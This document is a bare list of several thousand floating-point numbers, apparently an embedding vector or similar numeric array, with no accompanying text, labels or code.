-0.015199830755591393, -0.018117239698767662, -0.011236684396862984, 0.024897882714867592, 0.038072846829891205, 0.01822381094098091, 0.01117673795670271, 0.006164523772895336, 0.014227361418306828, 0.01734459213912487, -0.013594590127468109, 0.01008437480777502, -0.014120789244771004, -0.008479134179651737, 0.01658526621758938, -0.011536418460309505, -0.0070337518118321896, -0.00812611449509859, 0.019582604989409447, 0.011083487421274185, 0.034209609031677246, -0.012901872396469116, -0.035381902009248734, -0.009964481927454472, 0.0013987574493512511, -0.001793406903743744, -0.0145204346626997, 0.000946659070905298, -0.041962724179029465, -0.01649201661348343, 0.041083503514528275, 0.004126334562897682, 0.012275761924684048, 0.0005087147583253682, 0.029440512880682945, 0.0007035416783764958, -0.0027475592214614153, 0.002885769819840789, 0.020714931190013885, 0.020834825932979584, 0.0003682145616039634, -0.015026651322841644, -0.013774430379271507, 0.02986680157482624, 0.0007643210119567811, -0.010883664712309837, 0.011936063878238201, -0.035168759524822235, -0.03482240065932274, -0.01537301018834114, 0.022446727380156517, 0.00965142622590065, -0.001045737648382783, -0.018796635791659355, 0.007273538503795862, -0.0016768437344580889, -0.020048856735229492, 0.014134110882878304, 0.0019083047518506646, -0.008992011658847332, 0.011356578208506107, -0.011396543122828007, 0.024831274524331093, -0.0028224927373230457, 0.03668740764260292, 0.012175850570201874, 0.001517818309366703, 0.047824181616306305, 0.004675846081227064, -0.046865034848451614, -0.04364123195409775, -0.016958268359303474, -0.007526647299528122, 0.009718033485114574, 0.003536858130246401, -0.023379230871796608, 0.010011106729507446, 0.014866793528199196, -0.00817274022847414, -0.014880115166306496, 0.014653649181127548, -0.009298406541347504, 0.006640767678618431, -0.010750450193881989, 0.007280199322849512, 0.0027908540796488523, 0.016998233273625374, -0.0005445163114927709, 0.009011994116008282, -0.0014786864630877972, -0.053605712950229645, 0.004742453806102276, -0.0034535988233983517, 0.032211385667324066, -0.02428509294986725, -0.013148319907486439, 0.003606796031817794, 0.005944719072431326, -0.01920960284769535, -0.013634555041790009, 0.026336604729294777, -0.0044860150665044785, -0.004908972419798374, -0.005428511183708906, 0.014560398645699024, -0.03253110125660896, -0.010037750005722046, -0.020488465204834938, 0.012209154665470123, 0.004679176490753889, 0.03751334175467491, 0.01645205169916153, -0.005321939010173082, 0.007280199322849512, 0.01344805397093296, -0.01009769644588232, 0.027841933071613312, -0.02114121988415718, 0.018996458500623703, -0.02118118479847908, 0.00027850258629769087, -0.023485803976655006, 0.01734459213912487, 0.022500012069940567, 0.014573720283806324, 0.022766442969441414, 0.023392552509903908, 0.0027125903870910406, 0.02624335326254368, -0.012162528932094574, 0.00453930115327239, 0.011223363690078259, -0.013974253088235855, 0.013334820978343487, 0.026603033766150475, -0.010364126414060593, -0.013681179843842983, -0.01117673795670271, 0.009551514871418476, 0.004016431979835033, 0.010683842934668064, -0.033197175711393356, 0.032264672219753265, 0.0006348526803776622, 0.0005728245014324784, -4.6833395117573673e-7, -0.0015985799254849553, -0.00011562645522644743, 0.03197159990668297, -0.019875677302479744, -0.002277976367622614, 0.005222027655690908, -0.015506225638091564, -0.010031089186668396, -0.0053552426397800446, -0.008212704211473465, -0.0028940958436578512, 0.013041747733950615, -0.010617234744131565, 0.016998233273625374, -0.004749114625155926, 0.002507772296667099, 0.005421850364655256, -0.022726478055119514, 0.010603913106024265, 0.0016618570080026984, -0.027575504034757614, 0.022433405742049217, -0.01541297510266304, -0.011722919531166553, -0.004406085703521967, 0.006347694434225559, 0.013154980726540089, 0.030426304787397385, 0.013694501481950283, -0.012668745592236519, -0.04553288593888283, 0.0009016990079544485, -0.006867232732474804, -0.019809069111943245, -0.0018849921179935336, -0.005901424214243889, -0.010264215059578419, 0.029387228190898895, -0.01631883718073368, -0.02428509294986725, 0.013761108741164207, -0.005135437939316034, -0.032264672219753265, -0.006530865095555782, 0.00350022385828197, 0.0030972484964877367, 0.002434503985568881, -0.0022446727380156517, 0.02210036665201187, -0.03317053243517876, 0.018623456358909607, 0.004938946105539799, 0.00969139114022255, 0.016638552770018578, -0.015839261934161186, -0.008672296069562435, 0.02501777559518814, 0.016025763005018234, 0.02317940816283226, 0.021434292197227478, -0.021807294338941574, 0.004176290240138769, -0.013747787103056908, -0.0387389212846756, 0.0193694606423378, -0.014560398645699024, -0.00351354549638927, -0.010230911895632744, 0.007899649441242218, 0.0016460377955809236, -0.004682506900280714, -0.0007668188191018999, -0.0001589213206898421, 0.005678289104253054, -0.0022663201671093702, -0.0013005114160478115, -0.01629219390451908, 0.003933172672986984, 0.019995570182800293, 0.010823718272149563, -0.009298406541347504, 0.003720028791576624, -0.013021765276789665, -0.0017601031577214599, 0.004016431979835033, 0.004349469672888517, -0.01630551554262638, -0.014187396503984928, -0.01537301018834114, -0.006297738756984472, 0.011003558523952961, -0.039857927709817886, 0.008019542321562767, 0.00626443512737751, -0.033383678644895554, 0.013494678772985935, -0.03591476380825043, 0.03287746012210846, -0.006224470678716898, 0.007579933386296034, -0.02211368829011917, 0.006107907276600599, 0.0001483057567384094, 0.027442289516329765, -0.009438281878829002, -0.006494231056421995, -0.026629677042365074, 0.023405874148011208, -0.0027359030209481716, 0.0027758674696087837, 0.015546189621090889, -0.010803735814988613, -0.03293074667453766, 0.04057728871703148, 0.008818832226097584, -0.015972478315234184, -0.01494672242552042, 0.014160754159092903, -0.0077730948105454445, -0.00876554660499096, -0.011423185467720032, -0.018170524388551712, 0.016145657747983932, 0.01357460767030716, 0.011269988492131233, -0.013388106599450111, 0.02313944511115551, -0.009904534555971622, -0.022952944040298462, 0.006860572379082441, -0.013381445780396461, -0.006953822914510965, 0.01741120032966137, -0.016611909493803978, -0.003198825055733323, -0.02623003162443638, -0.02311280183494091, 0.016025763005018234, 0.0019682515412569046, -0.006973804906010628, -0.018130561336874962, 0.01746448501944542, -0.018543526530265808, 0.008472473360598087, -0.03487568721175194, 0.025843709707260132, 0.019955605268478394, -0.0013579603983089328, -0.005115455947816372, 0.04132329300045967, -0.011549740098416805, 0.028667867183685303, 0.01357460767030716, -0.000380287179723382, -0.01626555062830448, -0.004795739892870188, -0.002497781068086624, 0.011316613294184208, -0.0002982766891364008, 0.007506664842367172, -0.005821495316922665, -0.009771320037543774, -0.03977799788117409, -0.02601688914000988, 0.026722928509116173, 0.003896538633853197, 0.014280647039413452, 0.014373897574841976, 0.017051519826054573, -0.002945716492831707, -0.015879226848483086, -0.000680645345710218, -0.0030672752764075994, -0.010210929438471794, 0.0007376780267804861, 0.036234479397535324, -0.0035202063154429197, -0.00812611449509859, 0.009158531203866005, 0.005028866231441498, 0.018716705963015556, -0.02026200108230114, 0.009331710636615753, -0.012868568301200867, -0.015799298882484436, -0.0012072608806192875, 0.0040131015703082085, -0.015333046205341816, 0.01405418198555708, 0.0009308397420682013, 0.005212036427110434, 0.022686513140797615, 0.0064742485992610455, -0.002089810324832797, -0.006007996387779713, 0.00458925636485219, 0.011210042051970959, -0.018023988232016563, -0.004099691286683083, 0.02317940816283226, -0.005185393616557121, -0.017730915918946266, 0.023499125614762306, 0.02505774050951004, -0.0020415198523551226, 0.0009483242174610496, 0.014333933591842651, 0.016931625083088875, 0.009764659218490124, 0.010217590257525444, 0.02027532272040844, 0.0005728245014324784, 0.00969139114022255, -0.004429398570209742, 0.0009524872293695807, 0.017757559195160866, -0.008532420732080936, 0.005661637056618929, 0.019502675160765648, -0.017650986090302467, 0.014107467606663704, 0.012362351641058922, -0.01297514047473669, 0.008978690952062607, -0.0005112125654704869, -0.0009424960589967668, 0.0006985461222939193, -0.013614572584629059, 0.010877003893256187, 0.006217809859663248, 0.025883672758936882, 0.014746899716556072, -0.013814395293593407, -0.01851688325405121, -0.013141659088432789, -0.0008708930108696222, 0.020688287913799286, 0.023925412446260452, -0.00407304847612977, 0.011383221484720707, -0.006640767678618431, 0.022726478055119514, 0.015199830755591393, -0.013960931450128555, 0.006261104717850685, 0.010264215059578419, 0.0039631458930671215, -0.008405866101384163, 0.0022879675962030888, 0.015905870124697685, 0.009018654935061932, -0.02224690467119217, -0.0026543086860328913, 0.016079049557447433, 0.021687401458621025, -0.01101688016206026, -0.02319272980093956, -0.016718482598662376, 0.0027708718553185463, -0.0011065170401707292, 0.005968031939119101, -0.0003536441654432565, -0.0014204048784449697, 0.022926300764083862, 0.005232018884271383, 0.010350804775953293, 0.01489343587309122, 0.013035086914896965, 0.018916528671979904, 0.01741120032966137, -0.003943163901567459, 0.01496004406362772, 0.009391657076776028, 0.009391657076776028, -0.0016368792857974768, 0.0020048855803906918, -0.0030106587801128626, -0.00362011743709445, 0.01746448501944542, -0.010623895563185215, -0.025364134460687637, 0.01342807151377201, 0.011523096822202206, -0.004948936868458986, -0.003933172672986984, -0.01248890534043312, 0.009085262194275856, -0.016745124012231827, -0.001082371803931892, -0.03359682112932205, -0.01837034709751606, 0.007926291786134243, 0.017184734344482422, -0.016172301024198532, 0.016691839322447777, 0.0011115126544609666, 0.005002222955226898, 0.0019815729465335608, -0.0240985918790102, 0.02797514945268631, -0.008785529062151909, -0.013228248804807663, 0.0193827822804451, 0.004169629421085119, -0.01846359856426716, -0.008106132037937641, -0.014880115166306496, -0.019942285493016243, -0.016904983669519424, -0.005325269419699907, 0.011516436003148556, -0.013707823120057583, -0.012129224836826324, -0.009085262194275856, -0.032264672219753265, -0.007932952605187893, -0.009777980856597424, -0.005072161089628935, 0.030666092410683632, 0.005195384845137596, 0.007979578338563442, -0.007386771496385336, -0.008445831015706062, 0.009451603516936302, 0.019502675160765648, -0.0016327162738889456, 0.026309961453080177, 0.008332598023116589, 0.0006119564059190452, 0.009484907612204552, 0.012415637262165546, -0.012155868113040924, 0.00484236516058445, -0.003292075591161847, 0.0070404126308858395, 0.0030373018234968185, 0.008705600164830685, 0.01055728830397129, -0.018170524388551712, -0.007113680709153414, -0.009365013800561428, -0.0033253792207688093, 0.001491175382398069, 0.013761108741164207, -0.02216697484254837, -0.000050215807277709246, 0.012568834237754345, 0.015746012330055237, -0.010424072854220867, -0.015999121591448784, -0.015026651322841644, -0.02230018936097622, -0.020621681585907936, -0.01650533825159073, 0.008379222825169563, 0.0193428173661232, -0.012029314413666725, 0.003906529862433672, 0.008572384715080261, 0.023658983409404755, -0.009871231392025948, -0.011563061736524105, 0.00828597228974104, -0.0018883225275203586, -0.01846359856426716, -0.00002908874193963129, 0.008272651582956314, 0.00027413148200139403, -0.006117898505181074, 0.01162300817668438, 0.040923647582530975, -0.0012613794533535838, -0.022553298622369766, -0.023325946182012558, -0.017144769430160522, -0.007806398440152407, -0.00002478267197147943, -0.017890773713588715, -0.024857917800545692, 0.018929850310087204, 0.00813277531415224, 0.015666082501411438, -0.010757111012935638, -0.009444942697882652, 0.008399205282330513, 0.003693385748192668, 0.015266438014805317, -0.00605129124596715, 0.0060446304269135, 0.016811732202768326, -0.009051959030330181, 0.030106589198112488, -0.008938726037740707, -0.00031076560844667256, -0.0057349056005477905, 0.0012780313845723867, 0.018916528671979904, -0.03093252144753933, -0.008865457959473133, -0.02309948019683361, -0.011090148240327835, 0.001285524689592421, 0.015306402929127216, 0.005901424214243889, -0.007093698251992464, 0.014786864630877972, 0.0005187058704905212, 0.018956493586301804, 0.005461814813315868, -0.0026809517294168472, -0.01837034709751606, -0.027309073135256767, -0.03370339423418045, -0.007579933386296034, 0.02016874961555004, -0.006590812001377344, 0.005002222955226898, 0.0027408984024077654, 0.015905870124697685, 0.0032004902604967356, 0.021474257111549377, 0.013707823120057583, 0.015732690691947937, 0.0011731245322152972, -0.010170964524149895, 0.005378555506467819, -0.015452939085662365, 0.03298403322696686, 0.014134110882878304, 0.004968919325619936, 0.02623003162443638, -0.029307298362255096, -0.017557736486196518, -0.019849034026265144, -0.01490675751119852, -0.013061730191111565, -0.012662084773182869, -0.002089810324832797, 0.012828604318201542, 0.0020182072184979916, 0.016212264075875282, -0.001162300817668438, 0.01658526621758938, -0.021980473771691322, 0.025870351120829582, 0.01634548045694828, -0.005232018884271383, 0.005105464719235897, -0.02605685219168663, 0.019702497869729996, -0.008532420732080936, -0.03002665936946869, 0.0024728032294660807, 0.009804623201489449, -0.025297528132796288, 0.01069716364145279, 0.015053294599056244, 0.009977802634239197, 0.0005245340289548039, 0.012935175560414791, 0.005838146898895502, 0.017864130437374115, -0.006807286292314529, -0.009291745722293854, -0.003803288098424673, 0.013341481797397137, 0.032371245324611664, 0.011276649311184883, -0.007506664842367172, -0.01055062748491764, -0.021687401458621025, -0.01641208678483963, -0.012428958900272846, -0.004958928097039461, 0.007753112819045782, 0.009837927296757698, 0.015359688550233841, -0.011762883514165878, 0.016225585713982582, 0.014866793528199196, -0.022020438686013222, -0.023898769170045853, 0.02329930290579796, -0.011656312271952629, -0.002397869946435094, 0.004759105853736401, 0.019888998940587044, 0.006594142410904169, 0.03093252144753933, 0.00748002203181386, -0.000020333500287961215, -0.012788639403879642, -0.0015336376382037997, -0.007919630967080593, -0.02223358303308487, 0.022846370935440063, 0.021900545805692673, 0.00267595611512661, 0.01162966899573803, -0.01148313283920288, -0.012122564017772675, 0.016225585713982582, 0.0039631458930671215, 0.012135885655879974, -0.005305286962538958, -0.018956493586301804, -0.021727366372942924, -0.006833929102867842, -0.007879666984081268, -0.00006639934872509912, 0.0016893326537683606, -0.0003282500838395208, -0.008952047675848007, 0.007313502952456474, 0.02011546492576599, -0.005338591057807207, 0.011849474161863327, 0.001624390366487205, 0.007420075125992298, 0.023805519565939903, 0.006434284150600433, -0.015199830755591393, 0.01163632981479168, -0.007573272567242384, -0.004945606458932161, -0.01637212187051773, 0.007979578338563442, -0.0023262668401002884, 0.007306842599064112, -0.010916968807578087, -0.0008800515788607299, 0.010410752147436142, 0.01069716364145279, 0.001976577565073967, 0.0037699842359870672, -0.019036423414945602, 0.035328615456819534, -0.005671628285199404, -0.008419187739491463, 0.006590812001377344, 0.01853020489215851, 0.006297738756984472, -0.022606585174798965, 0.012642103247344494, -0.005228688474744558, -0.005388546735048294, -0.004922294057905674, -0.009997785091400146, -0.0022330163046717644, 0.009311728179454803, -0.014640327543020248, -0.014547077007591724, -0.02016874961555004, -0.0047624362632632256, -0.0053086173720657825, -0.006677401717752218, 0.011010219343006611, -0.028934296220541, -0.007373449858278036, 0.006694053299725056, 0.0013071721186861396, -0.0003111819096375257, -0.007533308118581772, 0.008512438274919987, 0.004878999199718237, -0.006127889733761549, -0.0028924306388944387, 0.009571497328579426, -0.002557727973908186, 0.02035525068640709, -0.014187396503984928, -0.002133105183020234, -0.0144804697483778, 0.00039298422052524984, 0.010823718272149563, 0.024884561076760292, 0.005115455947816372, 0.00372668937779963, 0.008365901187062263, -0.007286860141903162, 0.003849913366138935, -0.02621670998632908, 0.012175850570201874, -0.025617243722081184, -0.006131220143288374, 0.0000461308954982087, -0.0145204346626997, -0.018170524388551712, 0.0010948607232421637, -0.007972917519509792, -0.0044360593892633915, 0.004542631097137928, -0.012635442428290844, -0.006334372796118259, -0.0052153668366372585, 0.011463150382041931, -0.03285081684589386, 0.002314610406756401, 0.02685614302754402, -0.0029873461462557316, 0.0033553526736795902, 0.010004445910453796, 0.004336148034781218, 0.0193028524518013, -0.004789079073816538, -0.018610134720802307, -0.010177625343203545, 0.026669641956686974, -0.009158531203866005, 0.009864570572972298, 0.0051687415689229965, 0.004039744846522808, 0.01838366873562336, -0.027495574206113815, -0.01538633182644844, -0.0030839270912110806, 0.0289609394967556, 0.023485803976655006, -0.005012214183807373, -0.00438277330249548, 0.0070404126308858395, 0.00016662281996104866, 0.009871231392025948, 0.016971589997410774, -0.0016460377955809236, 0.005711592733860016, -0.013601250946521759, -0.003603465622290969, 0.0064242929220199585, -0.010257554240524769, 0.018063953146338463, 0.007153645157814026, 0.0045792656019330025, 0.004732462577521801, -0.02623003162443638, 0.00022813068062532693, 0.011010219343006611, 0.005228688474744558, -0.004069718066602945, -0.012941836379468441, -0.011816170066595078, -0.014307290315628052, 0.012129224836826324, -0.008059507235884666, -0.0046225604601204395, -0.0388721339404583, -0.013947609812021255, 0.022539976984262466, -0.019915642216801643, 0.012915194034576416, 0.03386325016617775, -0.003105574520304799, 0.01943606697022915, -0.01310835499316454, -0.004739123396575451, 0.0027558852452784777, 0.010024428367614746, 0.01148313283920288, -0.010330823250114918, 0.010950272902846336, -0.004599247593432665, 0.01553286798298359, -0.008299293927848339, -0.0032987361773848534, -0.012635442428290844, 0.003976467531174421, -0.014720256440341473, 0.024844596162438393, 0.0030373018234968185, -0.010810396634042263, 0.03093252144753933, -0.0031205611303448677, 0.007613237015902996, 0.001212256494909525, -0.01010435726493597, 0.001461201929487288, 0.009158531203866005, -0.008059507235884666, 0.016971589997410774, 0.009824605658650398, -0.01837034709751606, 0.021647436544299126, 0.026443175971508026, -0.004176290240138769, -0.004888990428298712, -0.013274874538183212, -0.009498229250311852, 0.0030739360954612494, -0.007599915377795696, 0.026283318176865578, 0.0030672752764075994, -0.0015985799254849553, 0.006147872190922499, -0.012289083562791348, -0.03253110125660896, -0.020501786842942238, 0.015053294599056244, -0.008658974431455135, 0.02612346038222313, -0.011509775184094906, -0.00701376935467124, -0.002277976367622614, 0.003436946775764227, 0.009045298211276531, 0.004942276049405336, 0.0070337518118321896, 0.01841031201183796, 0.01007771398872137, -0.004182950593531132, -0.01007771398872137, -0.007333485409617424, 0.020901432260870934, -0.014240683056414127, -0.016545303165912628, 0.007646540645509958, -0.009731355123221874, -0.015333046205341816, -0.03567497432231903, 0.011563061736524105, 0.004682506900280714, 0.032451171427965164, 0.00768650509417057, -0.006763991434127092, -0.00290242163464427, -0.007986239157617092, 0.00745337875559926, -0.014986686408519745, -0.007906310260295868, 0.002647648099809885, -0.028161650523543358, -0.005668297875672579, 0.0018217150354757905, -0.004935615696012974, -0.008585706353187561, -0.01300844457000494, 0.015799298882484436, -0.009804623201489449, -0.0008026203140616417, -0.025710493326187134, -0.01653198152780533, 0.0192762091755867, -0.0032354590948671103, -0.011816170066595078, 0.0041962722316384315, 0.009011994116008282, 0.00528197456151247, 0.002374557312577963, -0.007186948787420988, -0.008532420732080936, -0.0010623895796015859, 0.027708718553185463, 0.004988901317119598, -0.015706047415733337, 0.018769992515444756, 0.012435619719326496, -0.022606585174798965, 0.01210924331098795, -0.024751346558332443, -0.006620785221457481, 0.011356578208506107, -0.0015552850672975183, -0.014600363560020924, 0.003796627279371023, 0.013934288173913956, -0.0008792189764790237, 0.018650099635124207, -0.0008167744381353259, 0.007859684526920319, 0.0011015214258804917, -0.004832373932003975, -0.005608351435512304, 0.014986686408519745, -0.013214927166700363, 0.010963593609631062, -0.02425844967365265, -0.011456489562988281, -0.010537305846810341, 0.018849922344088554, 0.007140323519706726, 0.009058619849383831, -0.033330392092466354, -0.01299512293189764, -0.01342807151377201, -0.0031705168075859547, 0.014533756300807, -0.0015069945948198438, -0.00023166919709183276, -0.010437394492328167, 0.010617234744131565, 0.02702932246029377, 0.01058393158018589, -0.020941397175192833, -0.00186667509842664, -0.021927187219262123, 0.013481357134878635, 0.0033720044884830713, 0.016012441366910934, -0.02123446948826313, -0.029200727120041847, 0.00504884822294116, 0.003225468099117279, -0.006107907276600599, 0.007753112819045782, 0.019809069111943245, -0.013947609812021255, 0.028747795149683952, 0.0024228477850556374, -0.0029074172489345074, -0.0019715819507837296, -0.012702049687504768, 0.004792409483343363, 0.01539965346455574, -0.005911415442824364, 0.03106573596596718, -0.031385451555252075, 0.015093258582055569, 0.00005112645885674283, -0.026563070714473724, 0.015186509117484093, -0.0193827822804451, 0.021061290055513382, -0.006041300017386675, 0.00033928194898180664, -0.011110130697488785, -0.0039598154835402966, 0.017690951004624367, 0.011762883514165878, 0.02516431175172329, -0.0192628875374794, -0.022513333708047867, 0.0056916107423603535, -0.028721151873469353, -0.02232683263719082, 0.008778868243098259, 0.013881002552807331, -0.03993785381317139, -0.0192628875374794, 0.007966256700456142, 0.015932513400912285, -0.013408089056611061, 0.015919191762804985, -0.008246008306741714, 0.022833049297332764, 0.018916528671979904, 0.009158531203866005, 0.013920966535806656, -0.020648324862122536, 0.01727798394858837, -0.0016060732305049896, -0.01553286798298359, -0.003650090890005231, 0.004619230050593615, -0.00048498582327738404, 0.0017850808799266815, 0.02328598126769066, -0.0014628671342507005, -0.003776645055040717, 0.003586813807487488, -0.013388106599450111, -0.02120782621204853, 0.015079936943948269, 0.0096980519592762, -0.030639449134469032, 0.022766442969441414, -0.008539081551134586, 0.014866793528199196, -0.010883664712309837, -0.0005865622661076486, 0.004765766207128763, 0.006021317560225725, -0.008978690952062607, 0.0011273318668827415, -0.0070337518118321896, -0.005714923143386841, -0.00814609695225954, -0.00769316591322422, 0.016638552770018578, -0.0006864735041745007, -0.0005582540761679411, -0.005095473490655422, -0.00923179928213358, -0.015306402929127216, -0.015319724567234516, -0.01738455705344677, 0.022886335849761963, -0.00923846010118723, -0.01390764582902193, -0.01254219189286232, -0.01357460767030716, 0.021634114906191826, -0.0014961708802729845, -0.008106132037937641, 0.0029157432727515697, -0.00045584506005980074, -0.010237572714686394, 0.0060579520650208, -0.008992011658847332, 0.005428511183708906, -0.002371226903051138, -0.000025966515750042163, -0.010457376949489117, -0.03357017785310745, 0.021913867443799973, -0.015506225638091564, -0.014986686408519745, 0.01210924331098795, -0.022579941898584366, 0.0054051983170211315, 0.00702043017372489, -0.004269540775567293, 0.004089700523763895, 0.01252220943570137, -0.007673183456063271, 0.008579045534133911, 0.007406753487884998, 0.015985799953341484, 0.024618130177259445, -0.010064392350614071, -0.010404091328382492, -0.011269988492131233, -0.013334820978343487, -0.004948936868458986, -0.01642540842294693, -0.01404086034744978, -0.014720256440341473, -0.00001311335108766798, 0.003989789169281721, -0.00016329243953805417, -0.003373669693246484, 0.008405866101384163, 0.011116791516542435, 0.019822390750050545, -0.0006003000889904797, -0.01541297510266304, 0.0017601031577214599, 0.00018441950669512153, 0.003743341425433755, -0.033277105540037155, -0.00557837774977088, 0.012135885655879974, -0.02698935754597187, -0.017784202471375465, -0.007380110677331686, 0.012215814553201199, 0.009411639533936977, -0.0019615907222032547, 0.002832483733072877, 0.029067512601614, 0.0058747814036905766, 0.022833049297332764, 0.0009408309124410152, -0.006294408347457647, -0.016065727919340134, -0.0032404547091573477, -0.0001994061894947663, 0.003673403523862362, -0.003253776114434004, 0.00018212987924925983, -0.017118126153945923, 0.014853471890091896, -0.036074619740247726, 0.0016560289077460766, -0.022420084103941917, 0.0010465702507644892, -0.007213592063635588, -0.01653198152780533, 0.004476023837924004, 0.007886327803134918, -0.03570161759853363, 0.015266438014805317, -0.00023458327632397413, -0.014160754159092903, 0.012428958900272846, 0.006154532544314861, 0.03178509697318077, -0.0055950297974050045, -0.0011406533885747194, -0.028268221765756607, 0.014160754159092903, 0.010843700729310513, -0.007932952605187893, 0.0021281095687299967, -0.029493799433112144, 0.0025610581506043673, 0.017051519826054573, 0.028401436284184456, -0.011816170066595078, -0.020941397175192833, 0.01054396666586399, 0.003358683083206415, -0.011509775184094906, 0.010184286162257195, -0.0019749123603105545, 0.012808621861040592, 0.010510662570595741, 0.011316613294184208, 0.01103020180016756, 0.01390764582902193, 0.009777980856597424, 0.0058348169550299644, 0.0072668781504035, -0.003829931141808629, -0.016931625083088875, 0.024764668196439743, 0.013334820978343487, 0.012408976443111897, -0.02997337281703949, -0.018636777997016907, -0.007859684526920319, -0.020128784701228142, -0.005994674749672413, 0.025643886998295784, -0.0015519546577706933, 0.021527543663978577, 0.002690942957997322, -0.0005199547740630805, 0.0009708042489364743, 0.0038599043618887663, -0.015066616237163544, -0.032291315495967865, -0.005944719072431326, -0.008465812541544437, 0.0035202063154429197, -0.009598140604794025, 0.025896994397044182, 0.023725589737296104, 0.006174515001475811, 0.03676733747124672, 0.003693385748192668, 0.01738455705344677, 0.0024161869660019875, 0.004366121254861355, -0.012742014601826668, -0.026443175971508026, -0.026456497609615326, 0.012642103247344494, 0.010710485279560089, 0.008585706353187561, 0.015053294599056244, 0.02501777559518814, -0.0029973373748362064, -0.018503563478589058, 0.02038189396262169, 0.005045517813414335, -0.0014520434197038412, -0.005348581820726395, 0.008772207424044609, 0.007573272567242384, 0.010956933721899986, 0.009404978714883327, -0.02619006857275963, -0.011003558523952961, -0.012462262995541096, -0.028241578489542007, 0.020821504294872284, -0.02491120435297489, 0.017158091068267822, -0.012715371325612068, -0.015559511259198189, -0.007946274243295193, 0.01637212187051773, 0.004689167719334364, 0.0012921853922307491, 0.0019615907222032547, -0.02512434870004654, 0.018863243982195854, -0.0016252229688689113, 0.012628781609237194, -0.004412746522575617, -0.016651874408125877, -0.0241518784314394, 0.0025227589067071676, -0.01739787869155407, -0.00700044771656394, 0.027335716411471367, -0.02523091994225979, 0.016132336109876633, -0.025577278807759285, 0.015746012330055237, -0.008419187739491463, 0.008812171407043934, 0.02206040360033512, -0.011922742240130901, -0.025497348979115486, -0.0010474028531461954, -0.008505777455866337, 0.0007135327905416489, 0.01653198152780533, -0.0005857296637259424, -0.005305286962538958, 0.016545303165912628, 0.003358683083206415, -0.0031205611303448677, -0.0045293099246919155, -0.004396094940602779, 0.014094145968556404, 0.0015527872601523995, -0.010843700729310513, -0.00414298614487052, 0.028774438425898552, -0.012342369183897972, -0.013095034286379814, 0.0047158109955489635, 0.028348151594400406, 0.004166299011558294, 0.0096314437687397, -0.015119901858270168, -0.011696276254951954, 0.008392544463276863, -0.015039972960948944, -0.003636769251897931, -0.006574159953743219, -0.008565723896026611, -0.01492007914930582, 0.0067107053473591805, -0.01835702545940876, 0.01630551554262638, 0.005771539639681578, 0.029174083843827248, 0.012448941357433796, -0.01538633182644844, -0.010057732462882996, 0.019023101776838303, 0.030399661511182785, -0.017611023038625717, 0.031278882175683975, -0.004452710971236229, -0.02139432728290558, 0.014080825261771679, -0.008259329944849014, -0.011409863829612732, 0.004559283144772053, -0.0033536874689161777, 0.012635442428290844, -0.004725801758468151, -0.00817274022847414, 0.00746670039370656, -0.013081712648272514, -0.01638544350862503, 0.004123004153370857, 0.017837487161159515, 0.004176290240138769, -0.018596813082695007, -0.019662532955408096, -0.014267325401306152, 0.009957821108400822, 0.0027642110362648964, -0.0384192056953907, 0.008912082761526108, -0.017770880833268166, 0.00013071720604784787, 0.0016785089392215014, -0.020901432260870934, 0.00458925636485219, -0.023645661771297455, -0.011063504964113235, -0.003490232862532139, 0.011523096822202206, -0.009731355123221874, -0.01823713257908821, 0.017864130437374115, -0.01657194457948208, 0.005658306647092104, -0.0048090610653162, 0.006214479450136423, -0.017930738627910614, 0.0013937618350610137, -0.013188284821808338, 0.014720256440341473, 0.0016901652561500669, 0.005964701529592276, 0.020648324862122536, 0.007533308118581772, 0.024484915658831596, -0.016119014471769333, -0.008066168054938316, -0.017824165523052216, 0.001425400492735207, 0.008638991974294186, 0.0003480241575744003, 0.014560398645699024, 0.007892988622188568, -0.022779764607548714, -0.01842363364994526, -0.0006635771715082228, 0.0020964709110558033, 0.005608351435512304, -0.001846692874096334, -0.003756662830710411, 0.020035535097122192, -0.0068472507409751415, 0.006550847552716732, -0.00627775676548481, 0.0031472041737288237, 0.012202493846416473, 0.016025763005018234, 0.0032571065239608288, 0.005481796804815531, 0.006457597017288208, 0.016119014471769333, -0.0015353028429672122, -0.00969139114022255, -0.0018217150354757905, 0.006597472354769707, -0.0017784201772883534, 0.007879666984081268, 0.016198942437767982, 0.008505777455866337, 0.009598140604794025, -0.0290408693253994, 0.007153645157814026, -0.0062844171188771725, 0.026483140885829926, 0.015612796880304813, -0.0046691857278347015, 0.03492897003889084, 0.0193561390042305, 0.030079945921897888, -0.0076798442751169205, -0.02026200108230114, -0.005934727843850851, -0.025537313893437386, -0.0006952157709747553, 0.004689167719334364, 0.012175850570201874, -0.006807286292314529, -0.010956933721899986, 0.011369899846613407, -0.013015104457736015, 0.004239567089825869, -0.0069871265441179276, -0.015959156677126884, -0.007333485409617424, 0.012861907482147217, -0.011716258712112904, 0.023539088666439056, 0.007313502952456474, 0.0032354590948671103, -0.0015636109746992588, -0.013814395293593407, 0.014120789244771004, 0.020968040451407433, 0.0144671481102705, -0.02617674693465233, -0.01837034709751606, -0.014573720283806324, 0.02312612347304821, -0.02429841458797455, 0.006680732127279043, 0.014267325401306152, 0.001750111929140985, -0.026762891560792923, 0.015266438014805317, -0.01842363364994526, -0.0009691391023807228, -0.008319276385009289, 0.00815941859036684, -0.011909420602023602, 0.0074933432042598724, -0.007546629291027784, 0.012568834237754345, -0.00921181682497263, -0.008559063076972961, -0.01733127050101757, -0.0015502894530072808, -0.013641214929521084, -0.0013929292326793075, 0.015825942158699036, -0.008086150512099266, -0.00032367079984396696, 0.016984911635518074, -0.017744237557053566, -0.014293968677520752, 0.030426304787397385, 0.011822830885648727, -0.023645661771297455, -0.01390764582902193, 0.042069293558597565, -0.0013679515104740858, 0.025803744792938232, -0.00006124767241999507, 0.01943606697022915, -0.007666523102670908, 0.025497348979115486, -0.017984023317694664, 0.019835712388157845, -0.006191167049109936, 0.014720256440341473, -0.0096980519592762, -0.007386771496385336, -0.0040097711607813835, -0.012422298081219196, -0.019742462784051895, 0.010504002682864666, 0.01401421707123518, 0.0010515658650547266, 0.044946737587451935, 0.00373335019685328, 0.017171412706375122, 0.004739123396575451, 0.0017784201772883534, -0.001716808183118701, 0.030319733545184135, 0.02978687174618244, 0.002862457185983658, -0.014347255229949951, -0.000601132633164525, -0.006177845411002636, 0.021953830495476723, -0.010317501612007618, -0.007053733803331852, -0.0026459828950464725, 0.001973247155547142, 0.01055062748491764, -0.014147432520985603, -0.01747780665755272, 0.015626119449734688, 0.02619006857275963, 0.00006796046363888308, -0.008412526920437813, 0.011829491704702377, 0.008252669125795364, -0.01725134253501892, 0.002284637186676264, -0.02511102706193924, 0.010424072854220867, 0.01256217435002327, 0.01842363364994526, 0.0001822339545469731, 0.0003388656477909535, 